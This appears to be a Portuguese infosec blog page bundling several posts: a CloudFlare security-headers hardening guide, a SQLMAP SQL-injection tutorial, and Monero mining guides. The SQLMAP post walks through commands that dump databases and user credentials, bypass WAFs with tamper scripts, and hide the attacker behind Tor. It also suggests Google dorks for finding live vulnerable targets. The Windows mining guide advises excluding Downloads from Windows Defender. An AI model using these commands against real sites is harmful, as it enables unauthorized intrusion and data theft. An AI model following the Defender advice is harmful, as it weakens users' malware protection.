Téchne Digitus InfoSec Artigos

<índice "[ Hacking ]-[ Redes de Comunicação ]-[ DeepWeb ]-[ Anonimato ]-[ Criptomoedas ]-[ Programação ]-[ InfoSec em Geral ]-[ Off-Topic but Important ]-[ Redes Sociais ]" />

Mostrando postagens com marcador tutoriais. Mostrar todas as postagens
Mostrando postagens com marcador tutoriais. Mostrar todas as postagens
Logo Téchne Digitus InfoSec

Como Implementar Security Headers no CloudFlare

Neste post você irá aprender o que é CloudFlare, CDN e Security Headers. Também iremos ver como, através do CloudFlare, conseguimos configurar Security Headers, forçar HTTPS em seu site, configurar versões modernas e seguras de TLS e, por fim, ativar o DNSSEC. Postagem com dicas preciosas para hardenização de websites.


O que é o CloudFlare?

CloudFlare é basicamente um CDN, que é a sigla de Content Delivery Network. CDN é um recurso que mantém um cache distribuído em diversos pontos do mundo do seu site.

CloudFlare Logo - TéchneDigitus

A priori, o CDN serve como um servidor web terceiro que permite que seus visitantes acessem seu site de forma mais performática por estar disponível em diversos pontos do mundo. Por exemplo: se o seu site fica hospedado em um servidor no Brasil e ele for ser acessado de Portugal, o caminho pela internet entre o visitante e o seu site é intercontinental! Irão haver diversos "hopes", roteadores, no meio do caminho entre um e outro. Se o seu site também estiver disponível em um servidor do CDN em Portugal, a distância entre o seu site e o visitante será menor!

O CDN entregando seu site para você, ao invés do servidor do seu site, você irá economizar banda, processamento entre outros recursos do seu servidor. Isso pode representar uma economia de recursos realmente significante!

O CDN também permite que o seu site seja mais resiliente em diversos aspectos. Torna-se mais resistente a DDoS, DoS. Permite implementar WAF (Web Application Firewall) e também, que veremos mais fundo neste artigo, Security Headers sem se preocupar em fazer essa alteração em sua aplicação ou seu servidor web.

CDNs também possuem recursos extras, como por exemplo, permitir implementar DNSSEC (saiba mais sobre DNSSEC em: Uma Introdução ao DNSSEC), forçar TLS 1.2 ou superior (que é o protocolo de cifras HTTPS que encriptarão o conteúdo de seu site).

Além de recursos de segurança, diminuir o tráfego entre o seu servidor e a Internet e aumentar a performance de acesso para seus visitantes diminuindo a distância entre eles, permite compactar o código fonte de seu site! Versões pagas do CloudFlare ainda permitem outros recursos mais avançados como compactação de imagens, LoadBalance entre localidades e muito mais!

Finalmente, vale a pena ativar o serviço de CloudFlare em seu site mesmo que na versão Free! Para mais informações e, também ativar o CloudFlare em seu website, acesse: CloudFlare WebSite.

Após essa técnica, incompleta e talvez complicada introdução ao CloudFlare (depende do nível de conhecimento do leitor), vamos ao que interessa: Security Headers.

O que são Security Headers?

Security Headers são cabeçalhos de segurança que implementam regras de acesso ao seu site. São basicamente configurações realizadas em sua aplicação de servidor web para tornar o seu site mais resiliente a ataques como XSS e torná-lo mais confiável e seguro para seus visitantes.

Security Headers - TéchneDigitus

Existem no mercado alguns Security Headers importantes que precisamos conhecer, entre eles:

  • Strict-Transport-Security: O cabeçalho de resposta HTTP Strict-Transport-Security (geralmente abreviado como HSTS) permite que um site informe aos navegadores que ele deve ser acessado apenas por HTTPS, em vez de usar HTTP.
  • Content-Security-Policy: (Política de Segurança de Conteúdo, também conhecida como CSP) é uma camada adicional de seguranção que facilita a detecção e mitigação de certos tipos de ataques, incluindo Cross Site Scripting (XSS) e ataques de injeção de dados. Esses ataques são utilizados para diversos fins, e eles vão desde roubou de dados até desfiguração do site até distribuição de malware.
  • Feature-Policy: Provê um mecanismo de permitir ou bloquear o uso de funcionalidades do navegador no frame de seu site e em elementos como <iframe> dentro do documento. Ou seja, se recursos não são usados ou não são seguros, podem ser bloqueados com este header.
  • Referrer-Policy: Controla quanto de informação o Refer header, manda para o próximo site a ser acessado. Basicamente protege seus visitantes de compartilharem informações do site anterior para o próximo site a ser acessado a partir de seu site, ou seja, aumenta a privacidade de seu usuário.
  • X-Content-Type-Options: O header de resposta HTTP X-Content-Type-Options é um marcador usado pelo servidor para indicar que os MIME types enviados pelos headers Content-Type não devem ser alterados e seguidos. Isto permite que o usuário opte por não participar do chamado MIME Type Sniffing ou, em outras palavras, é uma forma de dizer que os webmasters estão vendo o que você está fazendo. Este header foi incluído pela Microsoft no IE 8 como uma maneira de webmasters serem capazes de bloquear o sniffing de conteúdo que acontecia na época, e podia transformar tipos MIME não executáveis em tipos executáveis. Desde então, outros browsers acataram a ideia mesmo que seus algoritmos de definição de MIME fossem menos agressivos.
  • X-Frame-Options: Pode ser usado para indicar se um site pode ser aberto com recursos do tipo <frame>, <iframe>, <embed> ou <object> dentro de seu site. Este é um recurso de segurança usado para bloquear ataques de clickjacking, garantindo que informações da utilização de dentro do seu site não possam ser interceptadas por sites terceiros. Este é, provavelmente, o Security Header mais importante a ser aplicado em todos os sites da Internet.
  • X-XSS-Protection: Esse header é uma funcionalidade dos navegadores como IE, Chrome, Safari que permite que o site pare de ser carregado quando eles detectam um ataque de XSS. Não é necessário para navegadores modernos, mas pode proteger o seu visitante caso esteja usando um navegador muito desatualizado.
Fonte das definições dos Security Headers: < https://developer.mozilla.org/ >


Como medir a nota dos Security Headers em meu site?

Basta usar a ferramenta online gratuita fornecida pela Sophos: Security Headers Tester

Avaliação de Security Headers - TéchneDigitus

Como implementar os Security Headers no CloudFlare:


CloudFlare Features Menu - TéchneDigitus

1. Clique em Workers.

CF Workers - TéchneDigitus
2. Clique no botão "Launch Editor".

Launch Editor - TéchneDigitus

3. Clique no botão "Add script".

Adicione o Script - TéchneDigitus

4. Escolha um nome para seu script. Pode chamá-lo de "securityheaders", por exemplo.

Nomeie o seu script - TéchneDigitus

5. Edite seu script. Dê um duplo clique no nome do seu script para abrir o editor.

Edite o seu script - TéchneDigitus
6. Copie e cole o script abaixo e clique no botão Deploy.

let securityHeaders = {
  "Content-Security-Policy" : "upgrade-insecure-requests",
  "X-Xss-Protection" : "1; mode=block",
  "X-Frame-Options" : "DENY",
  "Referrer-Policy" : "strict-origin-when-cross-origin",
  "Feature-Policy" : "microphone nome;; midi none;;",
}

addEventListener('fetch', event => {
  event.respondWith(addHeaders(event.request))
})

async function addHeaders(req) {
  let response = await fetch(req)
  let newHdrs = new Headers(response.headers)

  if (newHdrs.has("Content-Type") && !newHdrs.get("Content-Type").includes("text/html")) {
        return new Response(response.body , {
            status: response.status,
            statusText: response.statusText,
            headers: newHdrs
        })
  }

  Object.keys(securityHeaders).map(function(name, index) {
    newHdrs.set(name, securityHeaders[name]);
  })

  return new Response(response.body , {
    status: response.status,
    statusText: response.statusText,
    headers: newHdrs
  })
}

ATENÇÃO:
  • Esse script irá implementar os Security Headers: CSP, XSS-Protection, X-Frame-Options, X-Content-Type-Options, Referrer-Policy e Feature-Policy. O HSTS e o X-Content-Type-Options implementaremos de uma outra forma como veremos adiante.
  • As configurações usadas nos Security Headers deste exemplo funcionam na maioria dos casos sem maiores problemas, como por exemplo em um blog como este. Porém, dependendo das funcionalidades de seu site eles podem dar algum problema. Lembre-se de testar! Nesses casos, estude cada um dos Security Headers mais a fundo e entenda cada uma das opções disponíveis para cada um e implemente da forma correta. O importante é implementar todos! Não importa qual a configuração utilizada no final, pois para cada caso, o Security Header irá implementar a segurança e confiabilidade permitida para cada cenário.
Exemplo de Script - TéchneDigitus

7. Clique agora no botão "Add route".

Diga quais partes do seu site irão carregar o script de Security Headers. Neste exemplo, com "*[endereço]/*", fizemos com que todo o site utilizasse este script, ou seja, implementamos os Security Headers em todo o site.

Escolha em "Worker" o nome do script criado (securityheaders, neste exemplo).

Por fim, clique em "Save".

Adicione a rota - TéchneDigitus


PRONTO! Pode testar o seu site em e conferir o sucesso desta implementação!

HSTS, X-Content-Type-Options, TLS Seguro, Sempre HTTPS entre outras opções de segurança para o certificado de seu site

Na tela principal do CloudFlare, dentro das configurações de seu domínio, clique em SSL/TLS, e depois em "Edge Certificates".

TLS SSL Configs - TéchneDigitus

Nesta página, ative as seguintes opções:

Opções de Certificado - TéchneDigitus

Always Use HTTPS para que o CloudFlare sempre entregue seu site com criptografia.

Configure o HTTP Script Transport Security (HSTS) clicando no botão "Change HSTS Settings". Leia o aviso que aparecer e clique em aceitar. Então verá uma tela de configurações. Pode se basear na opções conforme a imagem abaixo:

HSTS - TéchneDigitus


Minimum TLS Version, escolha a opção 1.2. Desta forma, você forçará que seus visitantes utilizem somente a versão mais segura, recomendada explicitamente pelo padrão de segurança PCI.

Outras opções interessantes:

Outras opções interessantes - TéchneDigitus

Onion Routing, deixe em Off se você não tiver interesse que seus visitantes acessem o site pela Tor. Em nosso caso, permitimos que as pessoas acessem o Téchne Digitus pela Tor.

TLS 1.3, ativa o uso da versão mais recente do TLS. Teoricamente mais segura!

Automatic HTTPS Rewrites, automaticamente abre a página de recursos em seu site utilizando o HTTPS caso o recurso esteja disponível em HTTPS. Ou seja, entregará todo o conteúdo em seu site de forma encriptada sempre que possível!

Por fim, ative o DNSSEC se possível!

Nas configurações de seu domínio, clique na opção DNS.

Nesta página, procure pela opção de DNSSEC. Ative-a e siga as instruções apresentadas, pois você deverá configurar algumas opções no seu "Registrar". O seu "Registrar" pode ser o Registro.br ou o GoDaddy, por exemplo. Se você não configurar seu registrar com as opções conforme explicado (explicação que aparece ao ativar a opção), o DNSSEC não irá funcionar.

DNSSEC - TéchneDigitus

Teste o SSL/TLS de Seu site em: Qualys. SSL Labs

HTTPS Teste - TechneDigitus


Teste o DNSSEC de seu site em: VERISIGN DNSSEC Tester

DNSSEC Teste - TechneDigitus

Conclusão

Vimos como ativar diversas opções de segurança em um site somente utilizando a versão gratuita do CloudFlare.

Procuramos compilar aqui de forma simples, passo a passo e resumida, procedimentos avançados para proteção de um website. Informações extremamente valiosas para qualquer pessoa que mantenha um site na Internet.

Ativando todas as configurações apresentadas, pode-se muito bem mitigar quase que completamente diversos tipos de ataque de Sqlinjection, XSS, Phishing, Cache Poisoning, Man-in-the-middle, entre outros!

---

Para saber mais:
Logo Téchne Digitus InfoSec

Invadindo Sites com SQLMAP

SQLMAP Um Guia Completo Passo a Passo


Introdução e Objetivo


O objetivo deste artigo é ser um tutorial básico, prático e simples para ensinar como utilizar a ferramenta SQLMAP para explorar vulnerabilidades de SQL Injection em aplicações web (ou websites).

SQL Injection é uma classe de vulnerabilidade que através de requisições get ou post acrescidos de parâmetros de queries, podemos obter informações do banco de dados da aplicação que está sendo invadida.

SQLMAP é uma ferramenta opensource, gratuita que através de parâmetros específicos que serão apresentados neste arquivo, teste de várias formas diferentes se o site está ou não vulnerável e, caso estiver, permite que com alguns outros parâmetros, possamos de forma simples obter informações do banco de dados.


Instalação do sqlmap em um Linux

Debian-Like Comando: apt install sqlmap
Red Hat-Like Comando: yum install sqlmap


Apresentação dos parâmetros básicos

sqlmap -u "endereço_do_site" --threads=10 -o --batch --level=5 --risk=3

sqlmap - é o comando

-u "endereço_do_site" é a URL que testaremos o ataque. Ela pode conter um parâmetro que iremos explorar, por exemplo: "?cat=1" ou então um fomulário.

--threads=10 é um parâmetro que utilizar 10 processos do sqlmap simultaneamente para aumentar a performance do teste. Em casos onde o ataque deve ser silencioso ou o alvo seja sensível e possa ser impactado, pode ser que este parâmetro não deva ser utilizado. Mas de uma forma geral recomendo a sua utilização para ganho de tempo.

-o é outro parâmetro do sqlmap que visa otimizar a conexão com o alvo.

--batch é um parâmetro que automatiza um "Sim" para as perguntas básicas do wizard de teste do sqlmap.

--level=5 é um parâmetro que amplia os pontos de injeção que o sqlmap irá testar o ataque, ou seja, irá testar em parâmetros de cookies, headers, entre outros.

--risk=3 é um parâmetro que utiliza queries mais extensas e complexas.


Teste dos Parâmetros Básicos


A partir desse ponto você já sabe o básico! Existe um site liberado para testes da empresa Acunetix que é feito para testar ataques... Então teste o que você aprendeu!

Execute o seguinte comando e observe os resultados:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --threads=10 -o --batch --level=5 --risk=3

SQLMAP - Teste Básico Resultado - Téchne Digitus


Conclusão do Teste dos Parâmetros Básicos

Observando o output do teste descobrimos o seguinte:

- O parâmetro cat é vulnerável a 4 tipos de técnicas: boolean-based blind, error-based, AND/OR time-based blind, UNION query.
- O banco de dados identificado é o MySQL
- O webserver é um Nginx e utiliza PHP 5.3.10
- Não tinha um WAF protegendo o alvo

Com essas informações, poderíamos até ter feito um teste muito mais simples e rápido para conseguir invadir esse site! Como?

1. Removendo as opções --level=5, --risk=3.
2. Testando somente ataques de injection para MySQL
3. Poderíamos até testar um tipo de ataque, o error-based. Que é o mais trivial e rápido.
4. Foque o teste somente no parâmetro cat.

Sendo assim, vamos testar!

1. Limpe o SQLMAP com o comando:
sqlmap --purge

Assim poderemos retestar o alvo sem que o sqlmap leve em consideração testes anteriores.

2. Veja o comando enxuto:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --threads=10 -o --batch -p cat
--technique=e --dbms=MySQL --skip-waf

-p cat testa somente o parâmetro cat

--technique=e testa somente injections para a técnica error-based

--dbms=MySQL testa somente injections para MySQL

--skip-waf ignora o teste de WAF
Teste do Comando Enxuto - SQLMAP - Téchne Digitus


Teste de Obtenção de Dados do Banco de Dados


Uma vez que verificamos que o site é explorável com SQL Injection, vamos obter informações dos bancos de dados.


1. Descobrindo os bancos de dados:


sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --threads=10 -o --batch -p cat --technique=e --dbms=MySQL --skip-waf --dbs


Acrescentando o parâmetro --dbs obtemos quais os bancos de dados disponíveis neste alvo.
Conforme podemos observar na imagem abaixo, encontramos dois bancos de dados: acuart e information_schema.


Descobrindo os Bancos de Dados SQLMAP - Téchne Digitus


2. Obtendo as tabelas o banco:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --threads=10 -o --batch -p cat --technique=e --dbms=MySQL --skip-waf -D acuart --tables

O banco que nos interessa é o acuart. Então usamos o parâmetro -D acuart para obter os dados deste banco específico e então, utilizamos o parâmetro --tables para obter as tabelas deste banco.

Obtendo Tabelas com SQLMAP - Téchne Digitus

3. Obtendo os dados que nos interessam

3.1. Obtendo ("roubando") todo o banco de dados:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --threads=10 -o --batch -p cat --technique=e --dbms=MySQL --skip-waf -D acuart --tables --dump-all

Obtendo todo o banco de dados SQLMAP Téchne Digitus

Adicionando o parâmetro --dump-all obtemos todo o banco de dados que foi salvo (no meu caso) no diretório: /home/user/.sqlmap/output/testphp.vulnweb.com/dump/acuart/

Dump SQLMAP Téchne Digitus

3.2. Visualizando quais os campos específicos de uma tabela que nos interesse:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --threads=10 -o --batch -p cat --technique=e --dbms=MySQL --skip-waf -D acuart -T users --columns

Neste caso, a tabela que me interessou foi "users". Então usei -T users para escolher essa tabela no comando e --columns para obter o campos dessa tabela.

Obtendo Campos da Tabela User SQLMAP Téchne Digitus

3.3. Obtendo o conteúdo dos campos que nos interessam:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --threads=10 -o --batch -p cat --technique=e --dbms=MySQL --skip-waf -D acuart -T users -C uname,pass --dump

-C uname,pass --dump pedimos para que ele busque o conteúdo dos campos uname e pass (que seriam username e senha). Nesse alvo de teste, infelizmente o resultado é sem graça... rs

Uname e Pass SQLMAP Téchne Digitus

Testes Avançados

A partir de agora, iremos para a "pancadaria"!
Nas próximas sessões veremos outros tipos de testes importantes.
Tudo que vimos até agora foi o teste mais básico, mas muitas vezes não temos um parâmetro, temos somente um formulário de login. Queries simples podem não funcionar pois a vulnerabilidade pode estar escondida atrás de um WAF, uma aplicação web com alguma sanitização, validação de dados ou alguma configuração que faça com que o caminho para o injection não seja tão óbvio... Mas nem por isso ele não seja penetrável... O segredo do hacking é tentar de múltiplas formas diferentes até acharmos a forma certa!

Identificando o WAF

Com o parâmetro --identify-waf vamos identificar se existe um WAF no alvo e qual seria ele...

Vamos observar em três exemplos diferentes:

sqlmap -u "https://www.technedigitus.com" --identify-waf
Cloudflare - WAF- SQLMAP Téchne Digitus
Aqui temos o WAF do CloudFlare

sqlmap -u "https://www.uol.com.br" --identify-waf
CloudFront AWS - WAF - SQLMAP Téchne Digitus
Aqui temos o WAF CloudFront da AWS
sqlmap -u "https://www.symantec.com" --identify-waf
Akamai WAF - SQLMAP Téchne Digitus
Aqui temos o WAF da Akamai

sqlmap -u "http://testphp.vulnweb.com/" --identify-waf
Alvo sem WAF - SQLMAP Téchne Digitus
Aqui não temos WAF
Contornando o WAF

Isso não é simples, depende de um pouco de sorte e técnica misturados...
Mas veremos algumas parâmetros interessantes:

--random-agent Ele altera o agente web do teste, simulando um browser qualquer. Muitas vezes o WAF pode identificar que o ataque vem do SQLMAP e aplicar um bloqueio. Se simulamos um browser normal, temos chances de contorná-lo.

--tamper=nome_do_tamper Esse parâmetro permite que apliquemos encodes dos mais variáveis nos comandos de injection do SQLMAP.

Não é recomendável usar mais de três tipos de tamper em um ataque. E para cada tipo de banco de dados existem técnicas de tamper diferentes.

Em um teste de invasão insistente, devemos tentar múltiplas combinações. Isso não é fácil, requer tempo.

No link a seguir, temos uma referência bem completa dos tampers disponíveis e suas aplicações: https://securityonline.info/sqlmap-tamper-script-bypassing-waf/

No geral, recomendo dois tipos de teste com tampers.

Teste de Tamper Básico:

--tamper=space2comment é um tamper para múltiplos bancos de dados. Ele substitui espaços em branco da query de ataque por / ** /

--tamper=between,randomcase,space2comment é uma "combinação ninja" para alvos com MySQL. Recomendo.

--hex  é uma forma de tratar dados do banco de dados quando não estão ASCII. Tentar todas as combinações anteriores com e sem o --hex.

--no-cast é uma forma de tratar todo o comando do injection com caráteres string (espaços como "NULL"). Em alguns casos pode ser necessário e outros pode atrapalhar totalmente o injection. Não pode ser usado junto com o --hex. Também é sugerido testar todas as técnicas anteriores com e sem o --no-cast.


Injetando em Formulários


Formulário - SQLMAP - Téchne Digitus
Formulário para testar a injeção

Muitas vezes temos um formulário de login (ou até mesmo um campo de busca) em um site que não
existe na URL um parâmetro que possa ser injetado. Para injetar em um formulário, basta usarmos o parâmetro --forms. Teste com o exemplo abaixo:
sqlmap -u "http://testphp.vulnweb.com/login.php" --forms --threads=10 -o --batch

SQLMAP --forms Atack - Téchne Digitus

Realizando Testes Anônimos


Para atacarmos um alvo de forma anonimizada, ou seja, ocultando a nossa origem (escondendo meu IP pessoal), podemos utilizar o Tor.
Debian-Like Comando: apt install tor
Red Hat-Like Comando: yum install tor


Utilizando o Tor com o SQLMAP

sqlmap --tor --check-tor -u "http://testphp.vulnweb.com/login.php" --forms --threads=10 -o --batch --time-sec=15 --timeout=45 --retries=4

--tor ativa o Tor

--check-tor verifica se o Tor está sendo utilizado com sucesso. Para verificar, busque a seguinte linha no output: [INFO] Tor is properly being used

Como o Tor torna a conexão mais lenta e passível a erros ocasionados por diversas degradações que afetam banda e latência, recomendo o uso de alguns parâmetros adicionais para tornar a operação mais resiliente a falhas devido a conexões degradadas:

--time-sec=15 o padrão é 5, tempo de espera para resposta do banco de dados.

--timeout=45 o padrão é 30, tempo de espera antes de considerar uma conexão como perdida ou encerrada.

--retries=4 o padrão é 3, número de tentativas em caso de falha de uma conexão.

Tor com SQLMAP Téchne Digitus

Google Dorks


Para encontramos alvos para testes ÉTICOS E ANONIMIZADOS, podemos buscar no Google utilizando strings como "php?produto=", "php?id=", "php?item", "php?num=" mais algumas outras palavras para achar alvos em algum contexto, por exemplo: livros, roupas, loja, etc.
Google Dork Téchne Digitus
Exemplo de Google Dork


Conclusão


Neste artigo aprendemos como explorar vulnerabilidades de SQL Injection utilizando SQLMAP. Vimos técnicas básicas e "técnicas de guerra" mais avançadas para alvos hardenizados, como fazer isso de forma anônima e, por fim, como encontrar alvos para serem testados.
Logo Téchne Digitus InfoSec

Entenda - Minerando Criptomoedas 04: Como Minerar Monero no Windows 10

Minerando Monero no Windows 10 em 7 Passos

Neste artigo, descrevemos como garimpar a cripto moeda XMR em um Pool de Mineração, sem necessidade de cadastro, através da simples doação de algum processamento de seu sistema operacional Windows.

How to mine Monero Téchne Digitus InfoSec
HOW TO MINE MONERO

1. Tenha uma carteira


Acesse o site: https://web.getmonero.org/downloads/ , baixe o Monero, instale-o e por fim, faça um backup de sua carteira!

Outras duas opções para obter uma carteira são:
Tendo uma carteira, você obterá o id, endereço, chave pública ou qualquer outro nome que queira dar, para aquilo que é o código público de identificação de sua carteira.

2. No Windows Defender, coloque a pasta "Downloads" de seu Windows nas exceções:

Xmrig Download Téchne Digitus InfoSec
Ref.: https://github.com/xmrig/xmrig/releases - Versão 3.2 era a última versão estável até a data da última atualização deste artigo (04.11.2019)

Obs.: Se o seu Google Chrome bloquear o download do arquivo, vá em downloads e clique no botão "Manter arquivo perigoso", conforme imagem abaixo:

Manter arquivo perigoso Téchne Digitus InfoSec
Manter arquivo "perigoso"

4.  Extraia os arquivos para a pasta desejada (lembrando de que a mesma deve estar nas exceções do Windows Defender, também).


Xmrig 3.2 Téchne Digitus InfoSec


Xmrig Files TéchneDigitusInfoSec

5. Abra o arquivo "config.json" com o WordPad.


config.json technedigitus
config.json

6. Edite os três parâmetros a seguir:


Parâmetro 1 De:
    "donate-level": 5,
Parâmetro 1 Para:
    "donate-level": 1,

Obs. Parâmetro 1: Reduzimos a doação para o desenvolvedor do software de mineração, aumentando o nosso rendimento.

Parâmetro 2 De:
            "url": "donate.v2.xmrig.com:3333",
Parâmetro 2 Para: 
            "url": "xmrpool.eu:3333",

Obs. Parâmetro 2: Apontamos o endereço para o pool de mineração desejado. Aqui sugerimos o xmrpool.eu que não requer nenhum tipo de cadastro.

Parâmetro 3 De:
            "user": "YOUR_WALLET_ADDRESS",
Parâmetro 3 Para: 
            "user": "46pkBFPfEZ2hBrLEZ4p3NLCfqRKnKxAnXCBYg2XzUmgpg7UHHMNM3fH92Vh1K7qDciQS9ChQAHzyzFuLN7cXEui4GA2agoq",

Obs. Parâmetro 3: Você deve inserir neste parâmetro o endereço público de sua carteira de Monero. No exemplo acima o endereço usado foi o do Téchne Digitus InfoSec. Se quiser minerar com o nosso endereço, sem problemas! ;)


Parâmetros Alterados Téchne Digitus InfoSec

7. Execute o arquivo xmrig.exe como administrador

Execute o Xmrig como Admin Téchne Digitus InfoSec
Clique com botão direito e escolha "Executar como administrador"
Minerando Monero no Windows 10 Téchne Digitus InfoSec
E pronto! Você já está minerando Monero!!!
Obs. Passo 7: Após a primeira execução, pode ser necessário reiniciar o seu sistema para ativar o suporte de Huge Pages.


Dicas e Considerações Importantes:


accepted - Quer dizer que você conseguiu enviar um processamento bem sucedido ao pool e ele foi aceito! (isso é o que buscamos!)

speed- Na linha que aparecer speed, você verá qual o seu poder de mineração

Pagamentos e Status da Mineração:


b) Na página principal vai ter uma sessão chamada "Your Stats & Payment History", insira o id de sua carteira e clique no botão "Lookup". (Pode levar algum tempo para seus dados começarem aparecer)

Monitorando Pagamento Téchne Digitus InfoSec

c) Pagamento: Neste exemplo, no web.xmrpool.eu, o pagamento ocorre automaticamente após você obter 0.1 XMR com sua mineração.

Logo Téchne Digitus InfoSec

Slide Passo a Passo: Como Minerar Monero - Apresentação

 Slides: Como Minerar Monero

"Apresentação simples de como minerar Monero em 5 slides, utilizando um PC com Linux, unindo o processamento de seu computador a um pool de mineração aberto na Europa que não precisa de cadastro. (MoneroPool)"



Baixe e Compartilhe!
:)
Logo Téchne Digitus InfoSec

How to mine Monero in a Linux Machine

How to mine Monero in a Linux Machine

This article describes how to mine XMR in a Mining Pool, without register needs, just donating some processing of your Linux system.

Monero Mining Téchne Digitus

Be aware of some Pre-Reqs:

- Have a wallet
Access: https://web.getmonero.org/downloads/, download Monero, install and, make a backup of your wallet!

- Have pre-installed some useful softwares in your Linux: automake make gcc git libcurl4-gnutls-dev etc... Because you will had to download (clone) from Github the mining software, compile and then execute.

Debian-Like Linux Command Instalation example:
apt automake autoconf pkg-config libcurl4-openssl-dev libjansson-dev libssl-dev libgmp-dev make g++ gcc curl git -y

cpuminer-multi Downloading and Installing

(ref.: https://github.com/OhGodAPet/cpuminer-multi-opencl/blob/master/README.md)

sudo su
git clone https://github.com/virtual-coin/cpuminer-multi
cd cpuminer-multi/
./build.sh
make install


Running Mining Software (Mining!!)


cpuminer -a cryptonight -o stratum+tcp://xmrpool.eu:3333 -u 46pkBFPfEZ2hBrLEZ4p3NLCfqRKnKxAnXCBYg2XzUmgpg7UHHMNM3fH92Vh1K7qDciQS9ChQAHzyzFuLN7cXEui4GA2agoq -p x

Attention: Change the yellow address in the command to points to your own wallet.


Mining Monero Téchne Digitus



To Monitor your Mining Status

1) Access: https://web.xmrpool.eu

2) In the main page will be a session called "Your Stats & Payment History", insert your wallet's id and clicks in "Lookup" button. (That could take some time to your data starts to appear).

Payment Monitoring Téchne Digitus


Payment: In this example, we showed the web.xmrpool.eu, the mining will automatic send the monero for you when you reach 0.1 XMR.

Hope this article helps!
If you had some question, please leave in the comments.

Have nice mining! ; )



To know more (in PT-BR):

- Entenda - Minerando Criptomoedas 01: DogeCoin no Windows
- Entenda - Minerando Criptomoedas 02: DogeCoin no Linux
- Uma introdução ao Bitcoin
- A História do Bitcoin em "Data X Valor X Bullet Histórico"
Logo Téchne Digitus InfoSec

Entenda - Minerando Criptomoedas 03: Como Minerar Monero no Linux

Como Minerar Monero no Linux

Neste artigo, descrevemos como garimpar a cripto moeda XMR em um Pool de Mineração, sem necessidade de cadastro, através da simples doação de algum processamento de seu sistema Linux.

HOW TO MINE MONERO
HOW TO MINE MONERO


Atente-se a alguns pré-requisitos


- Tenha uma carteira.

Acesse o site: https://getmonero.org/downloads/ , baixe o Monero, instale-o e por fim, faça um backup de sua carteira!
Tendo uma carteira, você obterá o id, endereço, chave pública ou qualquer outro nome que queira dar, para aquilo que é o código público de identificação de sua carteira.


- Tenha alguns programas pré-instalados em seu Linux: automake make gcc git libcurl4-gnutls-dev etc...

Você precisará baixar (clonar) do Github o programa de mineração, compilá-lo e então executá-lo.


Baixando e Instalando o cpuminer-multi

(ref.: https://github.com/OhGodAPet/cpuminer-multi/blob/master/README.md)

Comandos:

sudo su


git clone https://github.com/OhGodAPet/cpuminer-multi.git


cd cpuminer-multi/


./autogen.sh


./configure
<ou> ./configure --disable-aes-ni <se não tiver suporte a AES-NI em seu processador)


make


Executando o minerador


./minerd -a cryptonight -o stratum+tcp://mine.moneropool.com:3333 -u 46pkBFPfEZ2hBrLEZ4p3NLCfqRKnKxAnXCBYg2XzUmgpg7UHHMNM3fH92Vh1K7qDciQS9ChQAHzyzFuLN7cXEui4GA2agoq -p x

Atenção: Substitua o endereço da carteira em cinza no comando acima para apontar a mineração para sua própria wallet.

Para acompanhar o status de sua mineração


1) Acesse: https://moneropool.com/

2) Na página principal vai ter a sessão "Your Stats & Payment History", insira o id da sua carteira e clique no botão "Lookup".

3) Você verá as seguintes informações:
Stats

4) Note que nesse mesmo site, tem uma sessão chamada "Estimate Mining Profits".
Insira o valor "Hash Rate:" obtido no passo anterior e poderá estimar a quantidade de ganhos por dia com seu hashpower total.

profits


be monero